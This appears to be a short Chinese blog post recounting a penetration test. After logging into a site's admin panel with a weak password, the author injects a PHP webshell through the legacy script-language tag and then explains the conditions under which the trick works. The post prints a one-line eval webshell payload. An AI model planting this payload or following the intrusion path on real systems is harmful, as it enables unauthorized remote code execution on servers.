以前在测试一个网站的时候，大佬提供了一个拿shell的思路，通过js拿到了shell。

当时的情况是这样的，首页为*****/bin/home.php，通过弱口令进入后台，后台所有上传等可以拿shell的路都被阻止了，当时有一个可以控制前端页面的功能点

凭上面的解释就可以看出来，这个是可以通过这里来修改首页内容的，这里仅仅做一个小演示

可以发现js的代码是可以成功执行的，就可以通过了这个方法来拿shell了，因为js的language参数是可以支持其他的语言的执行的，具体的可以自己去尝试，这里我们使用的是

<script language=php>@eval($_POST['web']);</script>

我在本地进行一次测试，就可以展现出效果了

当时只是知道了这个方法，并没有对这个进行深入的了解，今天抽了点时间对这个重新进行了一次复盘

这个方法的利用条件的限制比较严格，必须要求被改变的位置是php文件，当时还是很懵的，并不知道为什么可以这样操作，所以我重新确定了一遍可以利用的条件点，看图就可以明白了。

fun.php 这个是数据库的调用

test.php

test1.php

test.html

好了，利用条件已经很明确了，必须要php下确实存在的才可以被利用，这个方法可用完全是因为php支持html的原因，也算是多一个方法了，php7移除该方法

   学习更多技术，关注我：